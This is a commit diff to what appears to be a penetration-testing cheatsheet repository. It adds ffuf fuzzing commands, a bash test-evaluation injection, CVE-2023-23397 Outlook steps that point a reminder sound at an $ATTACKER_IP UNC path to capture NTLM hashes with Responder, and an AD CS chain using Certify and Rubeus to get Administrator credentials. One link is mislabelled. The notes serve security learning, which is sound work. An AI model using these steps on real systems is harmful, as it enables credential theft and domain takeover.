bump

Cryptography/GPG-Cheatsheet.md

@@ -1,5 +1,12 @@
 # GPG Cheatsheet
 
+## Generate Keypair
+
+* Generating a keypair via gpg
+```sh
+gpg --gen-key
+```
+
 ## Encryption via GPG
 
 * Encryption of a file via gpg 
@@ -21,4 +28,9 @@ gpg --armor --symmetric --cipher-algo <algorithm> $PLAIN_TEXT
 gpg --output original_message.txt --decrypt $CIPHER
 ```
 
+## Encrypt & Sign an eMail
 
+* Encryption and siging via gpg is done in the following way
+```sh
+gpg --encrypt --sign --armor -r bill.gates@microsoft.com  message.txt
+```

Cryptography/References.md

@@ -7,6 +7,7 @@
 
 ### Online Tools
 
+* [SSLshopper](https://www.tryhackme.com/)
 * [cryptool](https://cryptool.org)
 * [quipquip](https://quipquip.com)
 * [cryptii](https://cryptii.com/)

Enumeration/Websites.md

@@ -14,18 +14,31 @@
 
 ### Fuzz Faster U Fool
 
+* Simple Fuzzing
 ```sh
 ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt
 ```
+
 * Fuzz dirs
 ```sh
 ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 ```
+
 * Fuzz files
 ```sh
 ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt
 ```
 
+* Fuzz all existing websites regardless of HTTP status
+```sh
+ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://$IP/FUZZ -fs 0 -mc all
+```
+
+* Fuzz with other HTTP methods like POST
+```sh
+ffuf -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://$IP/FUZZ -fs $SIZE -mc all -C POST
+```
+
 #### Fuzz parameters
 
 ```sh

Exploits/Linux/Bash.md

@@ -0,0 +1,14 @@
+# Bash Exploit Possibilities
+
+## Eval
+
+
+## Test
+
+Test includes `-eq`. It can be used to execute code which is evaluated before the comparison. [Vidarholen](https://www.vidarholen.net/contents/blog/?p=716) show examples on how to do it.
+An example is the following
+```sh
+num=a[$(date >&2)]+42
+```
+
+`date` get executed and the test `[[ $num -eq 42 ]]` gets evaluated to true

Exploits/Windows/Outlook.md

@@ -0,0 +1,33 @@
+# Outlook Exploits
+
+## CVE-2023-23397
+
+Create an Appointment with a custom and malicious reminder sound. The sound file download uses __Universal Naming Convention (UNC)__ paths to refrence the file. The file is stored on a server controlled by the attacker. Goal is to get the NTLM(v2) Hashes. There needs to be no interaction by the target.
+
+
+Therefore, __PidLidReminderFileParameter__ have to be altered containing the UNC, for example `\\$ATTACKER_IP:$ATTACKER_PORT\payload.wav`. The source of the file may use __SMB__ or __WebDAV__.
+Further, __PidLidReminderOverride__ has to be set to __true__.
+
+### Usage
+
+`New Appointment` --> set `Reminder` to 0 minutes.
+
+`Outlook Spy` plugin is needed. Go to `OutlookSpy` tab, press `CurrentItem` and go to `Script`
+
+Set the following variables:
+
+```vbscript
+AppointmentItem.ReminderOverrideDefault = true
+AppointmentItem.ReminderPlaySound = true
+AppointmentItem.ReminderSoundFile = "\\$ATTACKER_IP\payloads\alert.wav"
+```
+
+* Set up `responder -I <interface>` to catch the NTLM hash.
+
+Press `Run` to save the variables. Send the appointment afterwards.
+
+### Resources
+
+* [api0cradle's Powershell POC](https://github.com/api0cradle/CVE-2023-23397-POC-Powershell.git)
+
+

Exploits/Windows/Responder.md

@@ -5,6 +5,36 @@
 Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication
 
 ## Usage
+
+### Grab NTLM Token
+
+* Setup responder
 ```sh
 responder -I tun0 -wrvd
 ```
+
+* Open an Shell on the windows target and request the attacker's SMB a.k.a responder
+```sh
+dir \\$ATTACKER_IP\C$
+```
+
+
+### Impersonate Domain -- Change Responder's certificates
+
+* After using nsupdate to add the attacker as a subdomain do the following tasks
+* Add a certificate and its private key to
+```sh
+/usr/share/responder/certs
+```
+* Edit `Responder.conf`
+```
+[HTTPS Server]
+
+; Configure SSL Certificates to use
+SSLCert = certs/cert.pem
+SSLKey = certs/key.pem
+```
+* Start responder
+```sh
+responder -I <interface>
+```

Miscellaneous/Active Directory/ad_enumeration.md

@@ -115,3 +115,23 @@ bloodhound --no-sandbox
 ## PowerView 
 
 ## WMI
+
+## Find Certifications and Private Keys
+
+Certification Services can be found with [the Certify tool](https://github.com/GhostPack/Certify.git).
+
+* Enumerate vunerabilities on the current user via Certify, use `FullName` found in the first step to insert domain in the second step
+```sh
+Certify.exe find /vulnerable /currentuser
+.\Certify.exe request /ca:$FULL_NAME /template:UserAuthentication /altname:Administrator
+```
+
+* Copy the found key and convert it like mentioned in the last line of the ouptut, for example
+```sh
+openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
+```
+
+* Get ticket with the the loot via Rubeus
+```
+.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
+```

Miscellaneous/References.md

@@ -1,4 +1,10 @@
 # Miscellaneous References
 
 ## Static Binaries
+
 [andrew-d's statically compiles binary compilation](https://github.com/andrew-d/static-binaries.git)
+
+## SuperTool
+
+* [SuperTool](https://mxtoolbox.com/SuperTool.aspx)
+

Post Exploitation/Windows/Windows PrivEsc.md

@@ -9,6 +9,7 @@
 * [privescheck](https://github.com/itm4n/PrivescCheck)
 * [windows exploit suggester](https://github.com/bitsadmin/wesng)
 * [hacktricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)
+* [Privilege Escalation Runbook](https://xorond.com/posts/2021/04/windows-local-privilege-escalation/)
 
 ## Account Types